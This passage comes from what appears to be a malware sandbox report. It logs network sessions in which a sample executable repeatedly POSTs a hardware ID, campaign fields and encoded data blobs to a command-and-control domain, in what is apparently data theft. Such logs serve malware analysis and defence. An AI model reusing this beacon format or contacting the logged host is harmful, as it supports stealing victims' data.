Data Ascii: OtDsQzoyE4RuFB6tdVVuS6xWMCEb1aya1/1giZLqh2UcNB0SHveGgByUXvxFhIrYPDfwcZoxWgy22TZPJ3jnVR6AbaefdiakDkROHZXVPntcFjABG9WsGhcdkNk3z0Hja6Ddw/oC0mAaYgi70bXvf2mDNJNLZBy6ow6A+XYOEIesBqyXfHSzMpgyOg0VcZt/SAfAgWs0fHrXHTApZr6RY6qAzTPaQrKUzsWurWU1zuvMoxR3bePoinap1U2y7XC
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 52 4e 61 63 6c 4a 55 66 74 52 65 66 64 57 45 76 39 74 63 52 2f 42 56 37 37 50 61 50 4c 4d 74 6f 55 32 54 61 6b 58 68 2b 2f 41 73 59 2f 72 47 42 43 4b 76 63 47 69 4c 31 43 4d 59 54 64 67 48 59 46 58 75 30 58 69 4b 42 38 30 51 65 65 5a 65 30 61 50 71 67 4d 33 54 65 68 4b 53 5a 4a 35 45 2f 79 32 31 35 52 35 62 2f 46 66 51 51 64 70 31 62 4a 34 44 79 31 5a 2f 49 75 34 51 5a 36 38 45 4f 57 48 70 77 58 43 51 47 41 49 2f 2b 59 4d 7a 4c 32 33 71 73 61 53 52 6d 35 46 5a 44 69 4d 74 77 45 6e 6d 44 69 44 44 53 36 44 39 45 35 71 53 67 69 52 75 52 47 37 73 52 54 57 4f 2b 34 7a 33 6b 41 47 72 52 52 7a 4b 78 31 6e 55 4c 78 42 59 31 65 50 62 42 42 6a 6e 76 76 43 43 6c 62 38 67 72 4f 33 56 74 65 2f 36 44 62 4d 57 46 31 71 68 75 67 79 32 75 31 5a 2f 49 75 34 52 4a 36 38 45
Data Ascii: RNaclJUftRefdWEv9tcR/BV77PaPLMtoU2TakXh+/AsY/rGBCKvcGiL1CMYTdgHYFXu0XiKB80QeeZe0aPqgM3TehKSZJ5E/y215R5b/FfQQdp1bJ4Dy1Z/Iu4QZ68EOWHpwXCQGAI/+YMzL23qsaSRm5FZDiMtwEnmDiDDS6D9E5qSgiRuRG7sRTWO+4z3kAGrRRzKx1nULxBY1ePbBBjnvvCClb8grO3Vte/6DbMWF1qhugy2u1Z/Iu4RJ68E
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 4c 69 5a 4b 34 30 50 6a 33 46 4a 61 34 37 44 42 66 77 6b 51 74 52 57 47 79 42 6d 32 54 4a 35 32 70 6b 5a 34 36 43 48 64 4c 37 6f 6a 4f 6b 66 76 52 4b 43 2b 4d 45 61 68 33 71 74 6f 59 58 58 65 46 63 2b 73 4d 6f 56 4f 32 57 44 30 47 6a 75 6f 43 64 38 31 70 43 67 34 52 75 39 44 37 74 68 51 58 65 4f 2f 79 33 67 4d 45 72 52 65 77 61 56 32 31 77 71 55 4c 71 68 32 55 63 4e 42 30 53 48 76 65 47 67 42 78 45 76 76 33 52 73 78 68 4b 6d 4f 47 57 49 48 33 54 36 6a 34 48 58 52 54 4d 45 73 70 68 6b 79 6f 41 2f 56 50 36 51 73 4a 6b 44 68 54 75 58 65 58 46 62 6f 76 38 64 78 44 77 79 79 57 4d 47 67 65 64 51 47 6e 57 2f 74 58 6e 54 41 61 72 31 35 71 44 68 71 47 61 6f 49 30 74 46 4e 53 65 7a 32 71 42 6f 57 55 4e 34 39 6f 37 6b 61 74 6d 66 5a 61 65 70 65 59 75 70 42 32 79 75
Data Ascii: LiZK40Pj3FJa47DBfwkQtRWGyBm2TJ52pkZ46CHdL7ojOkfvRKC+MEah3qtoYXXeFc+sMoVO2WD0GjuoCd81pCg4Ru9D7thQXeO/y3gMErRewaV21wqULqh2UcNB0SHveGgBxEvv3RsxhKmOGWIH3T6j4HXRTMEsphkyoA/VP6QsJkDhTuXeXFbov8dxDwyyWMGgedQGnW/tXnTAar15qDhqGaoI0tFNSez2qBoWUN49o7katmfZaepeYupB2yu
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 62 41 4b 6f 4e 64 58 56 75 79 35 77 33 49 49 46 4b 64 48 78 4b 6c 36 32 41 43 53 59 4f 41 4d 50 4b 63 49 31 54 71 6d 4a 79 4a 4e 34 6b 76 6e 6c 68 55 78 68 4e 32 41 64 68 46 65 37 52 65 49 67 32 58 4e 41 64 6b 47 6a 51 46 30 77 47 72 50 55 63 52 4c 61 6b 62 6b 43 4c 69 55 47 31 48 69 76 73 70 31 44 68 4f 79 55 38 47 79 65 39 67 43 6d 57 72 74 45 54 79 73 41 74 59 72 71 53 51 69 51 75 56 46 37 74 56 66 47 61 48 65 71 78 70 4a 47 61 30 56 6b 4f 49 79 37 77 47 58 64 65 6b 5a 4b 36 4a 42 76 6c 4b 77 62 6b 49 71 38 53 43 4c 76 52 74 65 34 2f 61 59 4d 30 6b 61 75 30 66 44 6f 58 6e 57 41 70 35 68 34 78 51 36 70 77 58 56 4e 36 51 68 4b 55 6e 6c 52 65 37 63 55 6c 44 6f 75 73 52 32 53 56 44 64 50 71 50 67 64 63 56 4d 77 53 79 6d 4e 52 75 46 4c 64 45 6a 37 30 68 42
Data Ascii: bAKoNdXVuy5w3IIFKdHxKl62ACSYOAMPKcI1TqmJyJN4kvnlhUxhN2AdhFe7ReIg2XNAdkGjQF0wGrPUcRLakbkCLiUG1Hivsp1DhOyU8Gye9gCmWrtETysAtYrqSQiQuVF7tVfGaHeqxpJGa0VkOIy7wGXdekZK6JBvlKwbkIq8SCLvRte4/aYM0kau0fDoXnWAp5h4xQ6pwXVN6QhKUnlRe7cUlDousR2SVDdPqPgdcVMwSymNRuFLdEj70hB
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 66 61 54 56 4c 75 74 64 5a 38 47 56 37 64 50 74 66 75 47 72 59 56 38 51 57 4e 58 6a 32 6b 51 59 35 37 37 79 59 6a 52 2b 39 4f 37 73 52 65 58 2b 43 35 79 58 67 4e 46 72 5a 56 7a 4b 52 31 32 41 2b 56 5a 65 45 64 4e 61 77 49 32 44 43 67 59 47 51 70 67 79 4f 67 30 55 4d 5a 74 2f 53 41 55 42 49 64 75 56 69 49 79 42 6e 43 51 76 45 46 2f 33 5a 52 77 30 48 52 4e 65 39 34 61 41 48 6b 52 75 58 57 55 56 2f 72 73 38 5a 37 44 42 36 2b 56 73 65 6b 64 4e 6b 44 6d 57 58 76 48 7a 79 74 43 39 30 2f 6f 69 4d 73 52 36 67 47 69 4c 30 77 47 65 69 75 67 43 6c 4c 58 70 56 4f 78 61 78 31 6e 57 54 79 63 61 68 32 55 62 46 70 76 56 4c 76 4a 79 59 42 73 41 71 67 33 56 64 64 36 4c 62 4e 63 67 45 62 73 56 2f 4e 6f 48 72 50 42 4a 6c 70 39 41 77 36 6f 51 54 61 4f 71 38 6b 4c 45 6a 75 53
Data Ascii: faTVLutdZ8GV7dPtfuGrYV8QWNXj2kQY577yYjR+9O7sReX+C5yXgNFrZVzKR12A+VZeEdNawI2DCgYGQpgyOg0UMZt/SAUBIduViIyBnCQvEF/3ZRw0HRNe94aAHkRuXWUV/rs8Z7DB6+VsekdNkDmWXvHzytC90/oiMsR6gGiL0wGeiugClLXpVOxax1nWTycah2UbFpvVLvJyYBsAqg3Vdd6LbNcgEbsV/NoHrPBJlp9Aw6oQTaOq8kLEjuS
2024-04-24 23:59:54 UTC | 1369 | IN | Data Raw: 58 68 39 32 72 4d 52 46 65 37 52 65 49 6c 58 48 54 41 70 35 34 39 31 4d 64 70 67 62 58 4c 37 38 33 4a 51 47 6d 49 49 75 39 47 31 2b 76 37 6f 49 69 52 33 62 65 50 6f 69 6b 59 35 31 55 32 7a 36 30 52 57 2f 37 56 6f 5a 72 78 30 73 31 44 34 41 6a 2b 62 34 77 4d 71 2b 67 67 43 6c 4c 54 50 73 39 6f 38 73 79 7a 30 7a 42 4c 4b 5a 5a 4f 62 6f 54 30 44 71 35 49 32 31 2f 31 6d 2f 32 33 46 78 4a 36 4b 48 50 4d 55 64 32 33 6a 36 49 72 7a 4b 46 54 71 41 47 6a 58 56 52 36 41 6a 52 49 72 34 32 4a 31 48 76 43 49 69 39 4d 47 61 68 33 71 73 61 53 51 62 31 44 59 72 67 52 39 34 43 6c 32 6e 77 44 33 65 50 46 39 77 2b 76 79 63 39 54 71 67 47 69 4c 30 77 47 65 6e 32 6d 44 4e 61 55 4e 30 2b 6f 2b 42 32 7a 45 7a 42 4c 4c 5a 4d 59 66 31 53 67 57 6e 39 53 45 46 65 70 69 43 4c 7a 7a
                                                  Data Ascii: Xh92rMRFe7ReIlXHTAp5491MdpgbXL783JQGmIIu9G1+v7oIiR3bePoikY51U2z60RW/7VoZrx0s1D4Aj+b4wMq+ggClLTPs9o8syz0zBLKZZOboT0Dq5I21/1m/23FxJ6KHPMUd23j6IrzKFTqAGjXVR6AjRIr42J1HvCIi9MGah3qsaSQb1DYrgR94Cl2nwD3ePF9w+vyc9TqgGiL0wGen2mDNaUN0+o+B2zEzBLLZMYf1SgWn9SEFepiCLzz
                                                  2024-04-24 23:59:54 UTC1369INData Raw: 67 48 35 4a 52 76 64 73 69 4b 4e 67 7a 30 4f 49 65 4f 73 4f 50 65 51 4a 78 7a 53 6a 59 47 51 44 71 41 54 6b 33 56 64 63 36 4b 61 50 59 78 6b 56 75 55 4f 45 70 47 43 64 51 74 73 75 39 78 55 31 75 67 2f 52 64 72 34 32 4a 31 48 72 54 65 65 61 55 30 6a 69 75 6f 41 2f 53 31 36 67 58 73 53 6d 66 38 68 44 69 48 6a 6c 43 44 33 6b 43 63 63 30 6f 32 41 56 44 34 41 6a 69 35 5a 44 47 62 66 30 67 45 51 4b 45 4c 74 53 33 72 45 2f 2f 51 65 56 62 65 6f 66 50 65 68 50 76 6c 4c 45 59 43 77 42 73 41 71 7a 6d 44 4d 79 68 50 62 45 59 45 6c 47 39 77 57 61 2b 79 65 4f 57 38 6b 38 6a 6e 55 6c 35 6d 6d 39 49 4d 64 4c 51 51 48 2b 43 4c 69 55 43 52 65 48 33 61 73 78 47 31 37 74 46 34 6a 6e 63 63 38 65 6e 32 33 77 48 58 32 57 50 39 63 30 6f 47 77 6b 53 75 68 50 38 4d 42 41 46 65 65
                                                  Data Ascii: gH5JRvdsiKNgz0OIeOsOPeQJxzSjYGQDqATk3Vdc6KaPYxkVuUOEpGCdQtsu9xU1ug/Rdr42J1HrTeeaU0jiuoA/S16gXsSmf8hDiHjlCD3kCcc0o2AVD4Aji5ZDGbf0gEQKELtS3rE//QeVbeofPehPvlLEYCwBsAqzmDMyhPbEYElG9wWa+yeOW8k8jnUl5mm9IMdLQQH+CLiUCReH3asxG17tF4jncc8en23wHX2WP9c0oGwkSuhP8MBAFee


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  2 | 192.168.2.4 | 49732 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-04-24 23:59:54 UTC | 286 bytes | OUT | POST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 18167
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:54 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:54 UTC2836OUTData Raw: b9 8c 98 dd 7e cd 12 32 f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8
                                                  Data Ascii: ~2MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3
                                                  2024-04-24 23:59:55 UTC | 812 bytes | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:54 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=n9ap7k7k2v8io70199tj8276jf; expires=Sun, 18-Aug-2024 17:46:33 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5d2thvt8xlbZDRds0TopIwSttfTVqJFfnovUQCMc44bAVqqegdPrzpmoVSZ7R3%2BPS5iuz8wRWXmOqM9OK%2BfNr56vN8UDuEbjASJszS5%2FMb6yTYk7j%2BmznTTXvHUW0VF%2FFPm8jHohNA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cbdfcfd44d0-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:55 UTC | 23 bytes | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:55 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  3 | 192.168.2.4 | 49733 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-04-24 23:59:55 UTC | 285 bytes | OUT | POST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 8788
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:55 UTC8788OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:55 UTC | 808 bytes | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:55 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=1qga6rcbh092r8iaqr0ngkqoe0; expires=Sun, 18-Aug-2024 17:46:34 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HjYXiT%2FHtMKaRqHtzbgrqctbFw3KabuExoFsL40exxirhxsPo6bN0SCX%2F8MK32I9Sncs9pBOfqNo1shqxYU1yIMPqVxzimUGevCjCEPZB4J%2FyOUXqnvXhjKE2RUmkvM6SgCSTI6UfQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cc358ccb045-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:55 UTC | 23 bytes | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:55 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  4 | 192.168.2.4 | 49734 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-04-24 23:59:56 UTC | 286 bytes | OUT | POST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 20441
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:56 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:56 UTC5110OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61
                                                  Data Ascii: `M?lrQMn 64F6(X&7~`a
                                                  2024-04-24 23:59:56 UTC | 812 bytes | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:56 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=dm6uvc98pclpamri2lsq6egjnu; expires=Sun, 18-Aug-2024 17:46:35 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h40V8J7WVz6j9vZvD2nCFPTBtYlv3wY%2Fe9UxkNYo8vcXAKdzfFPh3pgp%2FeuuhAjDWE6tfwpRYogNOt9UJOL3tifTuFqaWlR1O6iyOxEEdoEYLZhT%2Bsk%2Ft%2BYKI0kr4JiJjr9AkkZuDA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0cc9ce75ade4-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:56 UTC | 23 bytes | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:56 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  5 | 192.168.2.4 | 49735 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-04-24 23:59:57 UTC | 285 bytes | OUT | POST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 5438
                                                  Host: strollheavengwu.shop
                                                  2024-04-24 23:59:57 UTC5438OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 39 45 43 35 37 41 34 33 30 33 45 44 38 36 32 32 34 30 37 33 36 31 33 44 44 34 39 36 42 37 38 34 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 73 75 70 65 72
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"9EC57A4303ED86224073613DD496B784--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--super
                                                  2024-04-24 23:59:57 UTC | 802 bytes | IN | HTTP/1.1 200 OK
                                                  Date: Wed, 24 Apr 2024 23:59:57 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=rd61md0b7e5l2d8v0cv19holqe; expires=Sun, 18-Aug-2024 17:46:36 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ccPfu5D9XkLy4Aeg4KCEy9xMK4CMrDqlKEgNeJx5AUmqKHkQybwoFevVvXPSs0zF5oXFO1DRQ06YMfKoT6AMeI7eM0qcCOTKEnZg1PrzAHc9NuQ7oniRkuir9Rp8tvaGsumiOk89aw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 879a0ccfca5a53af-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-24 23:59:57 UTC | 23 bytes | IN | Data Raw: 31 31 0d 0a 6f 6b 20 31 38 35 2e 31 35 32 2e 36 36 2e 32 33 30 0d 0a
                                                  Data Ascii: 11ok 185.152.66.230
                                                  2024-04-24 23:59:57 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                  6 | 192.168.2.4 | 49736 | 172.67.163.209 | 443 | 6856 | C:\Users\user\Desktop\o7b91j8vnJ.exe
                                                  Timestamp | Bytes transferred | Direction | Data
                                                  2024-04-24 23:59:58 UTC | 285 bytes | OUT | POST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 1412
                                                  Host: strollheavengwu.shop
